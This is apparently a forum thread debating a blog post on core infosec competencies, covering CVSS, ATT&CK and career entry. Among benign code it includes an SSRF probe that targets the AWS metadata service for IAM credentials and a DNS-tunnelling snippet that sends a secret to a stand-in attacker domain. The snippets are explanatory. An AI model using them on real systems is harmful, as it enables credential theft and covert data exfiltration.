It also helps to have a rebellious and slightly sly streak, especially if you're going to do social engineering. You may have to learn to be more charismatic, or learn superficial charm[0], and be able to play on people's emotions.
Another thing: some people just fall into blackhat/whitehat/greyhat hacking naturally after learning that Everything is Broken[1].
> Once upon a time, a friend of mine accidentally took over thousands of computers. He had found a vulnerability in a piece of software and started playing with it. In the process, he figured out how to get total administration access over a network. He put it in a script, and ran it to see what would happen, then went to bed for about four hours. Next morning on the way to work he checked on it, and discovered he was now lord and master of about 50,000 computers. After nearly vomiting in fear he killed the whole thing and deleted all the files associated with it. In the end he said he threw the hard drive into a bonfire. I can’t tell you who he is because he doesn’t want to go to Federal prison, which is what could have happened if he’d told anyone that could do anything about the bug he’d found. Did that bug get fixed? Probably eventually, but not by my friend. This story isn’t extraordinary at all. Spend much time in the hacker and security scene, you’ll hear stories like this and worse.
Missing the most important one: being able to communicate security issues to non-security people. It doesn't matter that you're a super hacker if you can't explain why people should listen, or can't report your findings without the devs feeling like it's a personal attack.
I upvoted, but there is a place for super technical people who are not good at explaining.
There is also a lot of room for people who understand things technically but aren't exploiting boxes day in, day out, and who can talk about and explain a lot of these things in more general terms.
This actually helps with impostor syndrome. Not what I came here for, but the effect I notice. Since I've been doing the job, I figured I could mostly pull it off, but... it often still feels like I barely know what I'm doing.
Reading this list, the topics are quite varied from network to filesystem to scripting, and yet I'm definitely confident in 47 of these 50 topics. Two of the remaining three I can do as specified, but not more deeply. For the final one, I already knew I'm lacking ($cloud vendor specific permission stuff) but I just don't find that area very motivating even if it looks like the established cloud vendors are here to stay. Feels rather dull to memorize vendor-specific words for established techniques and learn platform-specific attacks like the metadata service on AWS.
Anyway, it also seems like a good list (nice to say when you just said you know basically all of this? heh), because the topics are so varied yet it seems to aptly cover what I actually use in daily work. Some points are rarer, of course, like pre-master secret logging for Wireshark (most of the time you do MITM rather than make the client log its decryption keys), but still good to know about. I will probably refer to this next time someone asks me how to get into security! My answers to that question were previously quite basic: just read up on attacks for the systems you're interested in or familiar with, or start with the OWASP Top 10 if you don't know where to begin. Then again, this list might also seem daunting if you need to ask how to get started, hmm.
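To be concrete about the key-logging approach: normally you just set SSLKEYLOGFILE for the client, but here's a toy sketch in Python (the hostname is only an example) of making a client write its TLS secrets where Wireshark can pick them up:

    import socket
    import ssl

    # Write the (pre-)master secrets to a key log file so Wireshark can decrypt
    # the capture (Preferences -> Protocols -> TLS -> key log filename).
    ctx = ssl.create_default_context()
    ctx.keylog_filename = "/tmp/sslkeys.log"  # same format as SSLKEYLOGFILE

    with socket.create_connection(("example.com", 443)) as sock:
        with ctx.wrap_socket(sock, server_hostname="example.com") as tls:
            tls.sendall(b"GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n")
            print(tls.recv(200))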
One thing to perhaps add would be subnetting / network isolation. It's not something you need in every assignment, but you need it more often than you might think. Even if you're doing a simple web assignment and find an SSRF through which you can obtain something important, being able to explain what isolation they're lacking, and how it's supposed to be implemented so that it can't be bypassed via e.g. VLAN tagging, is helpful to your client (even if only the most high-security organisations care to implement it properly). The list mentions CIDRs, but knowing that such a thing as IP ranges exists is of course not the whole story.
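For illustration, the sort of SSRF-to-something-important probe I mean, with the AWS metadata service as the target (the vulnerable endpoint and its url parameter are made up for the sketch):

    import urllib.parse
    import urllib.request

    # Hypothetical SSRF: the app fetches attacker-supplied URLs server-side, so we
    # point it at the instance metadata service to enumerate IAM role credentials.
    TARGET = "https://vulnerable.example/fetch"  # assumed vulnerable endpoint
    PAYLOAD = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

    url = TARGET + "?" + urllib.parse.urlencode({"url": PAYLOAD})
    with urllib.request.urlopen(url, timeout=10) as resp:
        print(resp.read()[:500])  # role names; credentials sit one path level deeper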
Also, the number of times the customer came with an isolated offline environment for either exams or sensitive systems... with a recursive DNS resolver... But I suppose #22 could cover that even if it doesn't specifically mention DNS tunneling.
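A toy example of why that recursive resolver matters, with exfil.example standing in for a domain whose authoritative nameserver an attacker controls:

    import base64
    import socket

    # Data can leave an "isolated" network as DNS lookups: the recursive resolver
    # forwards the query, and the attacker's authoritative server logs the label.
    secret = b"db password: hunter2"
    label = base64.b32encode(secret).decode().rstrip("=").lower()  # keep under 63 chars
    try:
        socket.gethostbyname(f"{label}.exfil.example")
    except socket.gaierror:
        pass  # NXDOMAIN is fine; the query itself already carried the data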
I'm at bullet one of this list and immediately, entirely skeptical, since that bullet suggests that a common core competency of infosec people is evaluating a CVE by its CVSS score (which, we're told, has meaning relative to your own environment; that's where the art lies, presumably).
But CVSS is an industry-wide joke. It means almost literally nothing (a 9+ is usually, but not always, more severe than a 2). It's a Ouija board, computed by a mysterious calculator and adjusted by imperceptible nudges until the score matches the intuitions of the scorer.
> a 9+ is usually, but not always, more severe than a 2
which is exactly why learning to read these things (the full vector, I believe is what the author meant rather than just the resulting number) is useful when looking at a list of CVEs. Will it tell you the full story and everything you need to know? Of course not. Will it tell you what the impact for your business situation will be? Nope. Does it help you initially filter out the network-accessible no-privileges-required vulnerabilities that apply to your situation because you aren't local on the host and don't have credentials? Yes, that's where it's helpful.
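To make that concrete, a toy sketch of the filtering I mean (the metric abbreviations come from the CVSS v3.1 spec; the example vector is made up):

    # Parse a CVSS v3.1 vector and pull out the remotely exploitable,
    # no-credentials-needed cases for a first triage pass.
    vector = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    metrics = dict(part.split(":") for part in vector.split("/")[1:])

    if metrics["AV"] == "N" and metrics["PR"] == "N" and metrics["UI"] == "N":
        print("network-reachable, no privileges or user interaction: look at this one first")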
My employer chose to use CVSS vectors to avoid discussions about whether something should be e.g. low/medium/high impact, and frankly I disagree with that choice. We still have those discussions, and the vector limits our ability to represent the likelihood of exploitation, the impact, or the resulting risk. So I'm fully on board that CVSS is very often not representative, especially the final score, and sometimes it also just doesn't ask the right 'questions' (the parameters) to reflect what the problem or impact is. But I can still see what the author meant about reading the CVSS vector specified for a CVE.
Tell me more about how a factual explanation of a software's exploitation techniques is a joke. I think you're drinking the koolaid that gets passed around repeatedly on boards like this.
Title should be adjusted to the actual title of the blog post: (Technical) Infosec Core Competencies
InfoSec is a management practice. These technical skills are nice to have, but with the exception of #1 (understanding CVEs, CWEs, and CVSSs), you do not need the skills on this list in order to acquire and be productive in an InfoSec job. Someone with these technical skills is cut out to be a security researcher, part of a Red Team, working on the detection side of a SOC, or similar. Those are great and valuable roles, but not quite InfoSec. For an InfoSec job, give me someone who knows security management frameworks, can read security guidance, who can lead on processes we use to manage IT security, who can generate (and optionally build) security status reports, who gets the organizational chain of command for how IT security work gets done.
If you get decent at 3/4 of this list, you're in the top 5% of infosec professionals. Not that knowing all of these is bad, but you do not need to have all of these skills to be a well paid, in-demand infosec worker. It also depends on what subfield you're going in.
Are you going to be the only infosec person at a small company? You need a lot more breadth than if you're going to be the email security gateway admin at a behemoth bank.
How do you prove you know these things to a potential employer?
A lot of businesses in this area are looking for credentials. A lot of competent people do not have credentials, and the credentials that do exist aren't very good anyway.
That goes beyond this one industry - the resume filter of HR departments is a tough gauntlet to get through. You'll have to start with intro-level jobs, get certified by a decent org (AWS security, SANS, or maybe some "code academy"-style cyber courses), and be able to talk about your home lab and interests.
While I agree with the bag of technical knowledge that's desirable for an infosec job, it's worth noting that many who hold such a role have pivoted from another, more or less technical, field of work. A software developer who has gotten familiar with networking, crypto, and pentesting over the years makes a smooth transition within the same company, ramps up on the details in a few weeks, and proudly wears the hat. Similarly, devops/cloud/site reliability engineers, and more commonly sysadmins and security consultants, have an easy time transitioning.
I like the objective of this article and most of what's in it but I think it leaves itself open to criticism.
I have doubts about the benefit of even implying a sense of objectivity to these so-called requirements, because infosec is such a wide field and people come to it from all over; many can, and do, get by without ever dealing with a lot of these things.
A lot of folks in the industry would say that this lacks mention of LDAP, SAML, and other key protocols. Many folks would say that this is a very *NIX-centric list of utilities, or will work an entire career and never even see SPF or DNSSEC. Many pentesters would say that your understanding of security is only as good as your knowledge of how to break it, and would insist on adding many more vulnerability types and tools to this list as "core competencies".

There's plenty of work being done in securing smart contracts and other cryptocurrency systems, so it's clearly opinion to insist on people avoiding it. Personally speaking, I think the insistence that there are tons of cryptocurrency people who don't know what cryptography is comes across as melodramatic and, at some level, not really possible. The idea of such people evangelizing about it while not even knowing what cryptography is is a contradiction. At this point most folks' beliefs on it are heavily correlated with personal politics, whether condemning or proclaiming it. That's a whole other topic, which is another reason why any binding opinions on it are not something I would include in an infosec core competencies list.
All this being said, I think getting to a consensus on what to learn is a good idea, and there are plenty of things that I personally agree with in this list, many or most of them even. The author is clear and up-front about it being based on his experience, but it appears pretty heavily so. It's still good, but I think this list would be better as a Git repository than a blog post.
I don't really think there are any lists like this that are "good", but I also don't know many people in the field that don't roll their eyes at ATT&CK these days.
When it comes to ATT&CK I have personally seen people go 50/50 on it, with most support coming from those in large enterprises. It's a pretty good resource for pentesting or red-team engagements, but probably could use less evangelizing.
I definitely haven't. Is it something you reference? Some of the technical aspects seem as fine as anything you could google, but the whole kill-chain thing always seemed a little overblown. I agree with your comment about it not benefiting practitioners as much.
Is your thesis that spending time analyzing and decomposing TTPs in the framework a waste of time? If it were, I would agree. My assertion is that it is not.
As far as embedding the TTPs in every marketing white paper out there, yeah, agree that’s dumb.
I don't love the term "TTP", but I'm not an IR person.
I don't think cataloguing things is intrinsically a waste of time.
I do think that a unified theory of how networks and computers are compromised is a pipe dream that doesn't reward the effort put into building or studying it.
Mostly, I think ATT&CK has done far more good for vendors as the basis for feature/function/benefit breakdowns than it has for practitioners.
You have one engineer that you send to enumerate the “Credential Dumping” TTP, read every reference, and model controls and detections. Mimikatz? Great, recompile the source code, modify the args, what’s left and how do you protect / detect? DCsync? How does it work? What events are triggered? How do you mitigate through defensive controls?
You have another that you send to read about cached credentials in a textbook.
You’re telling me the former does not come out ahead of the latter?
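To make the DCsync half concrete, this is the shape of detection that exercise tends to produce (a toy sketch; the GUIDs are the DS-Replication-Get-Changes rights as I recall them and the DC account list is a placeholder, so verify both against your own environment):

    # Toy detection: flag Event ID 4662 where a non-DC account requests directory
    # replication rights (the DCSync pattern).
    REPLICATION_RIGHTS = {
        "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes (as I recall)
        "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All (as I recall)
    }
    DC_ACCOUNTS = {"DC01$", "DC02$"}  # placeholder list of domain controller accounts

    def is_suspected_dcsync(event: dict) -> bool:
        # event is an already-parsed 4662 record, e.g. a row from your SIEM export
        return (
            event.get("EventID") == 4662
            and any(g in event.get("Properties", "").lower() for g in REPLICATION_RIGHTS)
            and event.get("SubjectUserName") not in DC_ACCOUNTS
        )

    print(is_suspected_dcsync({
        "EventID": 4662,
        "SubjectUserName": "jdoe",
        "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
    }))  # -> True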
I don't know, maybe most of what you're saying here is that ATT&CK is useful if you're a Windows admin. I may be biased, since I work primarily in software security and vulnerability research, and not IT security.
> I don't know, [...] I work primarily in software security and vulnerability research, and not IT security.
Umm, so do you think IT security (I'd say pentests fall well within IT security, let me know if that's where you disagree) is within your competency or not?
IT security is a different specialization than any sense of the term "pentesting". IT security people engage pentesters, in the same sense that pentesters engage IT infrastructure in order to, like, send emails and stuff.
Interesting, I do penetration tests as my day job and would therefore say that means I'm working in IT security. But I'm also not a native English speaker, so I might just be wrong. Just to make sure: what you call IT security is the securing of IT infrastructure, and what penetration testers do is, well, the testing thereof?
IT security is desktop and corporate infrastructure server security (file servers, email, directory), usually along with corporate network security (very big companies sometimes have distinct network security teams, but if you don't have that, IT security owns network security --- the wifi access points, the access routers, any weird 802.1X-type stuff you're doing, etc).
As soon as you move into prod servers you're typically talking about cloud/infrasec people, who are distinct from IT security people. Infrasec: IAM; IT Security: Active Directory.
As soon as you move to actual code that the corporation writes/maintains, you're in appsec. If your IT security group owns appsec, you're not doing appsec.
No offense, but your comments are indicative of an epic chasm between the nature of attacks happening on a daily basis at enterprises everywhere and the work being done by many in Infosec, even those held in high regard.
None taken. I mean what I said. If you're an enterprise Windows IT security person, I'm prepared to accept that ATT&CK is important to you as a practitioner. You can tell me that attacks on corporate Windows infrastructure are the most important problem in information security; I won't litigate that.
I've been out of the infosec game (as a focused profession) for like 10 years or so now, but I looked up ATT&CK and I think perhaps you're used to working with clients with a certain level of sophistication who either outsource their assessments or know what the gold standard looks like. When I was doing pentests (for KPMG, not exactly known for their deep technical bench and 0-day research), it was very clear that things like ATT&CK (at the time, PCI DSS and its ilk) were key to letting unsophisticated companies either throw middle-grade talent at the problem of information security or provide a way for junior technicians to increase their skillset without taking time from the seniors (for better or worse). You mentioned vendors in a prior comment - obviously, ATT&CK is the kind of thing that lets consultancies bring a trough to feed from, but you can employ the same (useful) techniques internally in a company that's organized into service-oriented BUs.
This (my) view is orthogonal to Windows vs Everything Else. When you're working at a medium-cap manufacturer of widgets, software has already eaten your business, but you're not going to attract employees like taviso, right? So you give your people ATT&CK and it's better than nothing.
Maybe a simpler, clearer thing for me to have said is that studying ATT&CK is probably neither especially good career advice nor a good representation of the core competencies of a security engineer. Security engineering is multi-specialized, and significant and important specializations in security aren't well represented in ATT&CK at all.
But really all I wanted to chip in with here is that ATT&CK is also an eye-roll topic, even for people working in the specializations where ATT&CK applies. Not all the things in ATT&CK, many of which are important, but ATT&CK itself. I'm making a descriptive statement, not a normative one.
And here is where all of you are missing the point. The point is not that the framework is one of competencies. The framework LITERALLY describes attacks happening all day, every day, allowing one to conceptualize second-order controls and build competency around engineering defenses. You're telling me it's not useful for a security engineer to learn how a first-stage payload drops and pulls its second-stage post-exploitation kit, or what post-exploitation vs. pre-exploitation even means?
> an epic chasm between the nature of attacks happening on a daily basis at enterprises everywhere and the work being done by many in Infosec
Because they're not listening when we tell them to not roll their own crypto!
Or in a more serious tone: organisations often ignore best current practices, even after they spent a lot of money to have us look at their work and we told them what mistakes we found. Maybe we should indeed work more on making it easier to do things right, rather than just telling them how to do it right. It feels a bit like how you can at least distribute free needles to avoid infectious diseases when you can't stop people from being addicted to drugs.
Although if you look at pure research (not just advice not being followed), the gap indeed gets even bigger. Things like formal verification are great for academics, but what would really help organisations is robust, append-only, easy-to-restore backups, so they can recover without paying after their stuff gets encrypted again. But that's not sexy, clever research, that's just plumbing. While that sort of plumbing is not typically considered our job as security testers, it's the kind of solution that can make a real difference when you look at the attacks actually being carried out. (Criminals can still try blackmail, but that seems to be much less lucrative on average, and good backups are also useful for accidental data destruction.)
Are you asking me to back up with data that ATT&CK is most frequently used by --- maybe almost exclusively used by --- corpsec Windows networking people?
[0] https://en.wikipedia.org/wiki/Superficial_charm
[1] https://medium.com/message/everything-is-broken-81e5f33a24e1